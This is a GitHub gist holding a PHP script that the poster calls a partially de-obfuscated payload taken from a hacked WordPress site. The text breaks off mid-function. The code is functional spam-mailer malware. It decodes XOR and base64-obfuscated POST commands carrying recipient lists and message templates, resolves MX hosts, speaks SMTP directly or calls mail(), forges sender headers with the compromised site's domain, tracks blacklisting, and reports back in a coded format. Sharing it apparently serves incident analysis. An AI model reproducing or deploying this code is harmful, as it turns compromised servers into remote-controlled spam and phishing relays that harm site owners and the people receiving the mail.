Skip to content

Instantly share code, notes, and snippets.

@troelskn
Created March 23, 2016 09:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save troelskn/f93ba5b92b2f4c800c30 to your computer and use it in GitHub Desktop.
Save troelskn/f93ba5b92b2f4c800c30 to your computer and use it in GitHub Desktop.
Partially de-obfuscated payload script from a hacked wp site
<?php
if (FALSE == nplqy70($u11, $pakfn17)) {
echo PHP_OS . '+' . md5(0987654321) . '+01+[[]]
';
exit;
}
$jkber87 = array();
for ($mrkfo51 = 0; $mrkfo51 < count($pakfn17['toList']); $mrkfo51++) {
$wxfxn29 = array(
'id' => $mrkfo51,
'g_mailto' => "",
'g_mailto+' => "",
'g_mailfrom' => "",
'g_mailfrom+' => "",
'g_domainto' => "",
'g_domainfrom' => "",
'g_namefirst' => "",
'g_namelast' => "",
'g_body' => "",
'g_subject' => "",
'g_fff' => FALSE,
'g_header' => "",
'g_headerfrom' => "",
's_header' => "",
's_mxhost' => "",
's_mxaddr' => FALSE,
's_sock' => FALSE,
's_time' => time() ,
's_step' => constant('STEP_CONNECT') ,
's_port' => 25,
's_datain' => "",
's_dataout' => "",
's_trig' => FALSE,
'l_err' => "",
'l_done' => FALSE,
'l_way' => 0,
'l_failsmtp' => FALSE,
'l_smtp_end' => FALSE,
'l_smtp_log' => "",
);
if (FALSE == rdble50($u11, $pakfn17['toList'][$mrkfo51], $pakfn17, $wxfxn29)) {
echo PHP_OS . '+' . md5(1111111111) . '+02+[[' . dcydj64($u11, $pakfn17['toList'][$mrkfo51]) . ']]
';
continue;
}
$jkber87[] = $wxfxn29;
}
$siytz64 = lqpzi27($u11, 1);
if (count($siytz64) > 0) {
echo PHP_OS . '+' . md5(1111111111) . '+06+[[' . dcydj64($u11, 'Banned start: ' . implode(',', array_keys($siytz64))) . ']]
';
}
wzuqo15($u11, $jkber87, $siytz64, $enizl83);
yqmbe45($u11, $jkber87);
ayyes70($u11, $jkber87);
ksqbs71($u11, $siytz64);
if (count($siytz64) > 0) {
echo PHP_OS . '+' . md5(1111111111) . '+07+[[' . dcydj64($u11, 'Banned stop: ' . implode(',', array_keys($siytz64))) . ']]
';
}
exit;
function ayyes70($u11, $jkber87)
{
$kiucs36 = 0;
$cxitl5 = "";
for ($mrkfo51 = 0; $mrkfo51 < count($jkber87); $mrkfo51++) {
if ($jkber87[$mrkfo51]['l_failsmtp'] == TRUE) {
echo "" . PHP_OS . '+' . md5(2222222222) . '+04+[[' . dcydj64($u11, $jkber87[$mrkfo51]['g_mailto'] . ' :: ' . $jkber87[$mrkfo51]['l_err']) . ']]
';
}
if ($jkber87[$mrkfo51]['l_done'] == TRUE) {
$cxitl5.= $jkber87[$mrkfo51]['l_way'];
$kiucs36++;
}
}
if ($kiucs36 == 0) {
echo PHP_OS . '+' . md5(0987654321) . '+04+[[]]
';
}
else {
echo 'OK+' . md5(1234567890) . '+' . $kiucs36 . '+' . count($jkber87) . '[' . $cxitl5 . ']
';
}
}
function yqmbe45($u11, &$jkber87)
{
if (!function_exists('mail')) {
return FALSE;
}
for ($mrkfo51 = 0; $mrkfo51 < count($jkber87); $mrkfo51++) {
if ($jkber87[$mrkfo51]['l_done'] == TRUE) {
continue;
}
if ($jkber87[$mrkfo51]['g_fff']) {
if (@mail($jkber87[$mrkfo51]['g_mailto+'], $jkber87[$mrkfo51]['g_subject'], $jkber87[$mrkfo51]['g_body'], $jkber87[$mrkfo51]['g_headerfrom'] . $jkber87[$mrkfo51]['g_header'], '-f' . $jkber87[$mrkfo51]['g_mailfrom'])) {
$jkber87[$mrkfo51]['l_done'] = TRUE;
$jkber87[$mrkfo51]['l_way'] = 2;
}
else {
$jkber87[$mrkfo51]['l_done'] = FALSE;
}
}
else {
if (@mail($jkber87[$mrkfo51]['g_mailto+'], $jkber87[$mrkfo51]['g_subject'], $jkber87[$mrkfo51]['g_body'], $jkber87[$mrkfo51]['g_header'])) {
$jkber87[$mrkfo51]['l_done'] = TRUE;
$jkber87[$mrkfo51]['l_way'] = 2;
}
else {
$jkber87[$mrkfo51]['l_done'] = FALSE;
}
}
}
}
function wzuqo15($u11, &$jkber87, &$siytz64, $enizl83)
{
while (rzdjn52($u11, $jkber87)) {
evuho1($u11, $jkber87, $siytz64, $enizl83);
usleep(25000);
}
}
function vsari64($u11, &$jkber87, $jepvv39, $degoh72, $oahyj37)
{
if ($jkber87[$jepvv39]['s_sock'] != FALSE) {
dgsvq12($u11, $jkber87[$jepvv39]['s_sock']);
}
$dqwpy49 = "";
if ($oahyj37 == TRUE) {
$dqwpy49 = '[' . $jkber87[$jepvv39]['s_port'] . ']';
}
$jkber87[$jepvv39]['l_err'] = $dqwpy49 . '[' . $jkber87[$jepvv39]['s_step'] . ']' . trim(preg_replace('/
/', ' ', $degoh72));
$jkber87[$jepvv39]['l_failsmtp'] = $oahyj37;
$jkber87[$jepvv39]['l_smtp_end'] = TRUE;
return;
}
function evuho1($u11, &$jkber87, &$siytz64, $enizl83)
{
$cslag77 = time();
foreach($jkber87 as $jepvv39 => $wxfxn29) {
if ($wxfxn29['l_smtp_end'] == TRUE) {
continue;
}
if ($wxfxn29['s_time'] + 20 < $cslag77) {
if ($jkber87[$jepvv39]['s_step'] == constant('STEP_CONNECT') && $jkber87[$jepvv39]['s_port'] != 587) {
dgsvq12($u11, $jkber87[$jepvv39]['s_sock']);
$jkber87[$jepvv39]['s_port'] = 587;
$jkber87[$jepvv39]['s_time'] = time();
continue;
}
vsari64($u11, $jkber87, $jepvv39, 'timeout', FALSE);
continue;
}
if (!empty($siytz64[zfuri16($u11, $enizl83, $jkber87[$jepvv39]) ])) {
vsari64($u11, $jkber87, $jepvv39, 'Bcnf!', TRUE);
continue;
}
switch ($jkber87[$jepvv39]['s_step']) {
case constant('STEP_CONNECT'):
if ($jkber87[$jepvv39]['s_mxaddr'] == FALSE) {
$jkber87[$jepvv39]['s_mxaddr'] = @gethostbyname($jkber87[$jepvv39]['s_mxhost']);
if (!@preg_match('/([0-9]{1,3}\.?){4}/', $jkber87[$jepvv39]['s_mxaddr'])) {
vsari64($u11, $jkber87, $jepvv39, 'resolve mx', FALSE);
break;
}
}
$rpfsm11 = 0;
$ftcug81 = '';
$jkber87[$jepvv39]['s_sock'] = avcbc52($u11, $jkber87[$jepvv39]['s_sock'], constant('SOCKET_PROTO_TCP') , $jkber87[$jepvv39]['s_mxaddr'], $jkber87[$jepvv39]['s_port'], 2, $rpfsm11, $ftcug81, TRUE);
if ($jkber87[$jepvv39]['s_sock'] == FALSE) {
break;
}
if ($rpfsm11 == 0 || $rpfsm11 === 56 || $rpfsm11 === 10056) {
$jkber87[$jepvv39]['s_step'] = constant('STEP_CONNECTED');
dzxhy75($u11, $jkber87[$jepvv39]['s_sock'], 15);
$jkber87[$jepvv39]['s_time'] = time();
}
break;
case constant('STEP_CONNECTED'):
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 220) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'EHLO ' . $jkber87[$jepvv39]['g_domainfrom'] . '
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_EHLO');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
case constant('STEP_EHLO'):
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'MAIL FROM:<' . $jkber87[$jepvv39]['g_mailfrom'] . '>
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_MAILFROM');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_MAILFROM'):
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'RCPT TO:<' . $jkber87[$jepvv39]['g_mailto'] . '>
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_RCPTTO');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_RCPTTO'):
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250 && substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 251) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'DATA
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_DATA');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_DATA'):
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 354) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = $jkber87[$jepvv39]['s_header'] . '
' . $jkber87[$jepvv39]['g_body'] . '
.
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_BODY');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_BODY'):
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'QUIT
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_QUIT');
$jkber87[$jepvv39]['s_time'] = time();
$jkber87[$jepvv39]['l_done'] = TRUE;
$jkber87[$jepvv39]['l_way'] = 1;
}
break;
}
break;
case constant('STEP_QUIT'):
if (brrgv69($u11, $jkber87, $jepvv39)) {
vsari64($u11, $jkber87, $jepvv39, 'Success!', TRUE);
}
break;
}
}
}
function bdcnw53($u11, &$jkber87, $jepvv39)
{
$rpfsm11 = 0;
$ftcug81 = "";
if ($jkber87[$jepvv39]['s_trig'] == FALSE) {
if (strlen($jkber87[$jepvv39]['s_datain']) != 0) {
return TRUE;
}
return FALSE;
}
$bsxhw62 = mzezd77($u11, $jkber87[$jepvv39]['s_sock'], 4086, $rpfsm11, $ftcug81);
if ($bsxhw62 == FALSE || $bsxhw62 == "") {
if ($rpfsm11 != 35 && $rpfsm11 != 10035 && $rpfsm11 != 11 && $rpfsm11 != 10060) {
vsari64($u11, $jkber87, $jepvv39, $ftcug81, FALSE);
return FALSE;
}
if (strlen($jkber87[$jepvv39]['s_datain']) != 0) {
return TRUE;
}
return FALSE;
}
$jkber87[$jepvv39]['s_datain'] = $bsxhw62;
return FALSE;
}
function brrgv69($u11, &$jkber87, $jepvv39)
{
$rpfsm11 = 0;
$ftcug81 = "";
if (strlen($jkber87[$jepvv39]['s_dataout']) == 0) {
return TRUE;
}
$bsxhw62 = nmavu24($u11, $jkber87[$jepvv39]['s_sock'], $jkber87[$jepvv39]['s_dataout'], $rpfsm11, $ftcug81);
if ($bsxhw62 == FALSE) {
if ($rpfsm11 != 35 && $rpfsm11 != 10035 && $rpfsm11 != 11 && $rpfsm11 != 10060) {
vsari64($u11, $jkber87, $jepvv39, $ftcug81, FALSE);
}
return FALSE;
}
$jkber87[$jepvv39]['s_dataout'] = substr($jkber87[$jepvv39]['s_dataout'], $bsxhw62);
if (strlen($jkber87[$jepvv39]['s_dataout']) == 0) {
return TRUE;
}
return FALSE;
}
function rzdjn52($u11, &$jkber87)
{
$oghrj40 = FALSE;
if (constant('SOCKET_TYPE') != constant('SOCKET_TYPE_SOCKET')) {
foreach(array_keys($jkber87) as $jepvv39) {
if ($jkber87[$jepvv39]['l_smtp_end'] != TRUE) {
$jkber87[$jepvv39]['s_trig'] = TRUE;
$oghrj40 = TRUE;
}
}
return $oghrj40;
}
$pdlqy10 = array();
foreach(array_keys($jkber87) as $jepvv39) {
if ($jkber87[$jepvv39]['l_smtp_end'] != TRUE) {
if ($jkber87[$jepvv39]['s_sock'] == 0 || $jkber87[$jepvv39]['s_step'] == constant('STEP_CONNECT')) {
$jkber87[$jepvv39]['s_trig'] = TRUE;
}
else {
$jkber87[$jepvv39]['s_trig'] = FALSE;
$pdlqy10[] = $jkber87[$jepvv39]['s_sock'];
}
$oghrj40 = TRUE;
}
}
if (count($pdlqy10) == 0) {
return $oghrj40;
}
$thfyk26 = @socket_select($pdlqy10, $nuvll55 = NULL, $tlply10 = NULL, 0);
if ($thfyk26 == FALSE || $thfyk26 == 0) {
return $oghrj40;
}
foreach(array_keys($jkber87) as $jepvv39) {
$jkber87[$jepvv39]['s_trig'] = FALSE;
foreach($pdlqy10 as $hbjou68) {
if ($jkber87[$jepvv39]['s_sock'] == $hbjou68) {
$jkber87[$jepvv39]['s_trig'] = TRUE;
break;
}
}
}
return $oghrj40;
}
function kkked94($u11, $ybmww10)
{
if (function_exists('socket_create') && function_exists('socket_connect') && function_exists('socket_read') && function_exists('socket_write')) {
define('SOCKET_TYPE', constant('SOCKET_TYPE_SOCKET'));
return TRUE;
}
if (function_exists('fsockopen')) {
define('SOCKET_TYPE', constant('SOCKET_TYPE_FSOCKET'));
return TRUE;
}
if (function_exists('stream_socket_client')) {
define('SOCKET_TYPE', constant('SOCKET_TYPE_STREAM'));
return TRUE;
}
define('SOCKET_TYPE', constant('SOCKET_TYPE_NO'));
return FALSE;
}
function rdble50($u11, $hqboq32, $pakfn17, &$wxfxn29)
{
$snahi3 = array();
if (FALSE === @preg_match('/(.*?;)?(.*?;)?(.+@(.+)?);?/', $hqboq32, $snahi3)) {
return FALSE;
}
if (!isset($snahi3) || count($snahi3) != 5) {
return FALSE;
}
$wxfxn29['g_namefirst'] = @ucfirst(str_replace(';', "", $snahi3[1]));
$wxfxn29['g_namelast'] = @ucfirst(str_replace(';', "", $snahi3[2]));
$wxfxn29['g_mailto'] = str_replace(';', "", $snahi3[3]);
$wxfxn29['g_domainto'] = str_replace(';', "", $snahi3[4]);
if (!isset($wxfxn29['g_mailto']) || $wxfxn29['g_mailto'] == "") {
return FALSE;
}
if (!isset($wxfxn29['g_domainto']) || $wxfxn29['g_domainto'] == "") {
return FALSE;
}
if (isset($wxfxn29['g_namefirst']) && $wxfxn29['g_namefirst'] != "") {
$wxfxn29['g_mailto+'] = '"' . $wxfxn29['g_namefirst'] . ' ' . $wxfxn29['g_namelast'] . '" <' . $wxfxn29['g_mailto'] . '>';
}
else {
$wxfxn29['g_mailto+'] = $wxfxn29['g_mailto'];
}
$wxfxn29['g_domainfrom'] = $pakfn17['hostFrom'];
if (preg_match('/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/', $pakfn17['hostFrom']) || @ini_get('safe_mode')) {
$wxfxn29['g_fff'] = FALSE;
}
else {
$wxfxn29['g_fff'] = TRUE;
}
$wxfxn29['g_mailfrom'] = $pakfn17['fromLogin'] . '@' . $pakfn17['hostFrom'];
if (isset($pakfn17['fromName']) && $pakfn17['fromName'] != "") {
$wxfxn29['g_mailfrom+'] = $pakfn17['fromName'] . ' <' . $wxfxn29['g_mailfrom'] . '>';
}
else {
$wxfxn29['g_mailfrom+'] = $wxfxn29['g_mailfrom'];
}
$wxfxn29['s_mxhost'] = sgzvr68($u11, $wxfxn29['g_domainto']);
$wxfxn29['g_subject'] = @str_replace('%R_NAME%', $wxfxn29['g_namefirst'], $pakfn17['subjTempl']);
$wxfxn29['g_subject'] = @str_replace('%R_LNAME%', $wxfxn29['g_namelast'], $wxfxn29['g_subject']);
$wxfxn29['g_body'] = @str_replace('%R_NAME%', $wxfxn29['g_namefirst'], $pakfn17['bodyTempl']);
$wxfxn29['g_body'] = @str_replace('%R_LNAME%', $wxfxn29['g_namelast'], $wxfxn29['g_body']);
$wxfxn29['g_body'] = @str_replace('%MAIL_EN%', dcydj64($u11, $wxfxn29['g_mailto']) , $wxfxn29['g_body']);
$wxfxn29['g_header'] = 'X-Priority: 3 (Normal)
';
$wxfxn29['g_header'].= 'MIME-Version: 1.0
';
$wxfxn29['g_header'].= 'Content-Type: text/html; charset="iso-8859-1"
';
$wxfxn29['g_header'].= 'Content-Transfer-Encoding: 8bit
';
$wxfxn29['g_headerfrom'] = 'From: ' . $wxfxn29['g_mailfrom+'] . '
';
$wxfxn29['g_headerfrom'].= 'Reply-To:' . $wxfxn29['g_mailfrom+'] . '
';
$wxfxn29['s_header'] = 'Date: ' . @date('D, j M Y G:i:s O') . '
';
$wxfxn29['s_header'].= $wxfxn29['g_headerfrom'];
$wxfxn29['s_header'].= 'Message-ID: <' . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . '@' . $pakfn17['hostFrom'] . '>
';
$wxfxn29['s_header'].= 'To: ' . $wxfxn29['g_mailto+'] . '
';
$wxfxn29['s_header'].= 'Subject: ' . $wxfxn29['g_subject'] . '
';
$wxfxn29['s_header'].= $wxfxn29['g_header'];
return TRUE;
}
function sgzvr68($u11, $ttgac24)
{
$tivvs87 = array();
$iwzsk88 = array();
if (function_exists('getmxrr')) {
@getmxrr($ttgac24, $tivvs87, $iwzsk88);
}
else {
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_NO')) {
return FALSE;
}
$thfyk26 = kymrg16($u11, $ttgac24, constant('DNS_TYPE_MX'));
if ($thfyk26 == FALSE || !isset($thfyk26['ans'])) {
return FALSE;
}
foreach($thfyk26['ans'] as $mrtnn50) {
if ($mrtnn50['type'] == constant('DNS_TYPE_MX')) {
$tivvs87[] = $mrtnn50['data'];
$iwzsk88[] = $mrtnn50['preference'];
}
}
}
if (count($tivvs87) == 0) {
return FALSE;
}
$gwcxa40 = array_keys($iwzsk88, min($iwzsk88));
return $tivvs87[$gwcxa40[0]];
}
function zozoy17($u11, $ttgac24)
{
if (function_exists('gethostbyaddr')) {
return gethostbyaddr($ttgac24);
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_NO')) {
return FALSE;
}
if (!preg_match('/^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$/', $ttgac24, $xannw62)) {
return FALSE;
}
if (empty($xannw62) || count($xannw62) != 5) {
return FALSE;
}
$thfyk26 = kymrg16($u11, $xannw62[4] . $xannw62[3] . $xannw62[2] . $xannw62[1] . 'in-addr.arpa', constant('DNS_TYPE_PTR'));
if ($thfyk26 == FALSE || !isset($thfyk26['ans'])) {
return FALSE;
}
foreach($thfyk26['ans'] as $mrtnn50) {
if ($mrtnn50['type'] == constant('DNS_TYPE_PTR')) {
return $mrtnn50['data'];
}
}
}
function nplqy70($u11, &$pakfn17)
{
if (count($_POST) < 2) {
return FALSE;
}
$qqhjy59 = false;
$djedc15 = $pwzsl80 = "";
foreach(array_keys($_POST) as $ggkku5) {
if ($ggkku5[0] == 'l') {
$djedc15 = $ggkku5;
}
if ($ggkku5[0] == 'd') {
$pwzsl80 = $ggkku5;
}
if ($ggkku5[0] == 'e') {
$qqhjy59 = true;
}
}
if ($djedc15 == "" || $pwzsl80 == "") {
return FALSE;
}
$yheud27 = zqrkk46($u11, $djedc15, $qqhjy59);
$qxaeg20 = zqrkk46($u11, $pwzsl80, $qqhjy59);
if ($yheud27 == FALSE || $qxaeg20 == FALSE) {
return FALSE;
}
$pakfn17['toList'] = @preg_split('/#/', $yheud27);
$pakfn17['fromLogin'] = $pakfn17['fromName'] = $pakfn17['subjTempl'] = $pakfn17['bodyTempl'] = "";
$snahi3 = array();
if (FALSE !== @preg_match('/<USER>(.*?)<\/USER>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['fromLogin'] = $snahi3[1];
}
if (FALSE !== @preg_match('/<NAME>(.*?)<\/NAME>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['fromName'] = $snahi3[1];
}
if (FALSE !== @preg_match('/<SUBJ>(.*?)<\/SUBJ>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['subjTempl'] = $snahi3[1];
}
if (FALSE !== @preg_match('/<SBODY>(.*?)<\/SBODY>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['bodyTempl'] = $snahi3[1];
}
$pakfn17['hostFrom'] = @preg_replace('/^(www|ftp)\./i', '', $_SERVER['HTTP_HOST']);
if (preg_match('/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$/', $pakfn17['hostFrom'])) {
$jkwmb75 = zozoy17($u11, $pakfn17['hostFrom']);
if ($jkwmb75 != FALSE) {
$pakfn17['hostFrom'] = $jkwmb75;
}
else {
$pakfn17['hostFrom'] = 'domain.com';
}
}
if (($zfstt22 = strpos($pakfn17['hostFrom'], ':')) !== false) {
$pakfn17['hostFrom'] = substr($pakfn17['hostFrom'], 0, $zfstt22);
}
$pakfn17['hostFrom'] = @strtolower($pakfn17['hostFrom']);
return TRUE;
}
function zqrkk46($u11, $ggkku5, $qqhjy59)
{
if (!isset($ggkku5) || $ggkku5 == "") {
return FALSE;
}
$luwnl52 = @$_POST[$ggkku5];
if ($qqhjy59) {
$luwnl52 = nqygw82($u11, $luwnl52);
for ($gwcxa40 = 0; $gwcxa40 < strlen($luwnl52); $gwcxa40++) {
$luwnl52[$gwcxa40] = chr(ord($luwnl52[$gwcxa40]) ^ 2);
}
}
return urldecode(stripslashes($luwnl52));
}
function nqygw82($u11, $wbhde23)
{
$oghrj40 = "";
for ($mrkfo51 = 0; $mrkfo51 < 256; $mrkfo51++) {
$ousdp9[$mrkfo51] = chr($mrkfo51);
}
$cypnk62 = array_flip(preg_split('//', 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/', -1, 1));
$salxs44 = array();
preg_match_all('([A-z0-9+\/]{1,4})', $wbhde23, $salxs44);
foreach($salxs44[0] as $cfojp62) {
$bvpdr17 = 0;
for ($mrkfo51 = 0; isset($cfojp62[$mrkfo51]); $mrkfo51++) {
$bvpdr17 = ($bvpdr17 << 6) + $cypnk62[$cfojp62[$mrkfo51]];
if ($mrkfo51 > 0) {
$oghrj40.= $ousdp9[$bvpdr17 >> (4 - (2 * ($mrkfo51 - 1))) ];
$bvpdr17 = $bvpdr17 & (0xf >> (2 * ($mrkfo51 - 1)));
}
}
}
return $oghrj40;
}
function dcydj64($u11, $surff43)
{
for ($gwcxa40 = 0; $gwcxa40 < strlen($surff43); $gwcxa40++) {
$surff43[$gwcxa40] = chr(ord($surff43[$gwcxa40]) ^ 2);
}
return base64_encode($surff43);
}
function nhraz16($u11, $pnlpz9)
{
$surff43 = nqygw82($u11, $pnlpz9);
for ($gwcxa40 = 0; $gwcxa40 < strlen($surff43); $gwcxa40++) {
$surff43[$gwcxa40] = chr(ord($surff43[$gwcxa40]) ^ 2);
}
return $surff43;
}
function avcbc52($u11, $uwtpi87, $ncwir84, $qxhif66, $dqwpy49, $lvfwb5, &$rpfsm11, &$ftcug81, $vzcon96 = false)
{
$iinie89 = "";
$dsndu37 = NULL;
$pkbfn64 = NULL;
$rpfsm11 = 0;
$ftcug81 = "";
if ($ncwir84 == constant('SOCKET_PROTO_TCP')) {
$iinie89 = 'tcp';
$dsndu37 = SOL_TCP;
$pkbfn64 = SOCK_STREAM;
}
else
if ($ncwir84 == constant('SOCKET_PROTO_UDP')) {
$iinie89 = 'udp';
$pkbfn64 = SOCK_DGRAM;
$dsndu37 = SOL_UDP;
}
else {
$ftcug81 = 'Error: invalid protocol';
return FALSE;
}
switch (constant('SOCKET_TYPE')) {
case constant('SOCKET_TYPE_SOCKET'):
if ($uwtpi87 == FALSE) {
$uwtpi87 = @socket_create(AF_INET, $pkbfn64, $dsndu37);
if ($uwtpi87 == FALSE) {
$rpfsm11 = socket_last_error();
$ftcug81 = socket_strerror($rpfsm11);
break;
}
socket_set_option($uwtpi87, SOL_SOCKET, SO_REUSEADDR, 1);
socket_set_option($uwtpi87, SOL_SOCKET, SO_RCVTIMEO, array(
'sec' => $lvfwb5,
'usec' => 0
));
socket_set_option($uwtpi87, SOL_SOCKET, SO_SNDTIMEO, array(
'sec' => $lvfwb5,
'usec' => 0
));
if ($vzcon96) {
socket_set_nonblock($uwtpi87);
}
}
if (!@socket_connect($uwtpi87, $qxhif66, $dqwpy49)) {
$rpfsm11 = socket_last_error($uwtpi87);
$ftcug81 = socket_strerror($rpfsm11);
}
if ($vzcon96) {
socket_set_nonblock($uwtpi87);
}
break;
case constant('SOCKET_TYPE_FSOCKET'):
$uwtpi87 = @fsockopen($iinie89 . '://' . $qxhif66, $dqwpy49, $rpfsm11, $ftcug81, $lvfwb5);
if ($uwtpi87 && $vzcon96) {
@stream_set_blocking($uwtpi87, 0);
}
@stream_set_timeout($uwtpi87, $lvfwb5);
break;
case constant('SOCKET_TYPE_STREAM'):
$uwtpi87 = @stream_socket_client($iinie89 . '://' . $qxhif66 . ':' . $dqwpy49, $rpfsm11, $ftcug81, $lvfwb5);
if ($uwtpi87 && $vzcon96) {
@stream_set_blocking($uwtpi87, 0);
}
@stream_set_timeout($uwtpi87, $lvfwb5);
break;
default:
$ftcug81 = 'Error: invalid socket type';
return FALSE;
}
return $uwtpi87;
}
function dgsvq12($u11, &$uwtpi87)
{
if ($uwtpi87 == FALSE) {
return;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
@socket_close($uwtpi87);
}
else {
@fclose($uwtpi87);
}
$uwtpi87 = FALSE;
return;
}
function mzezd77($u11, $uwtpi87, $zbqcr30, &$rpfsm11, &$ftcug81)
{
if ($uwtpi87 == FALSE) {
return FALSE;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
$oghrj40 = @socket_read($uwtpi87, $zbqcr30, PHP_BINARY_READ);
if ($oghrj40 == FALSE) {
$rpfsm11 = socket_last_error($uwtpi87);
$ftcug81 = socket_strerror($rpfsm11);
}
}
else {
if (@feof($uwtpi87)) {
return FALSE;
}
$oghrj40 = @fread($uwtpi87, $zbqcr30);
if (strlen($oghrj40) == 0) {
$rpfsm11 = 35;
}
}
return $oghrj40;
}
function nmavu24($u11, $uwtpi87, $bsxhw62, &$rpfsm11, &$ftcug81)
{
if ($uwtpi87 == FALSE) {
return FALSE;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
$oghrj40 = @socket_write($uwtpi87, $bsxhw62);
if ($oghrj40 == FALSE) {
$rpfsm11 = socket_last_error($uwtpi87);
$ftcug81 = socket_strerror($rpfsm11);
}
}
else {
if (@feof($uwtpi87)) {
return FALSE;
}
$oghrj40 = @fwrite($uwtpi87, $bsxhw62);
}
return $oghrj40;
}
function dzxhy75($u11, $uwtpi87, $lvfwb5)
{
if ($uwtpi87 == FALSE) {
return FALSE;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
@socket_set_option($uwtpi87, SOL_SOCKET, SO_RCVTIMEO, array(
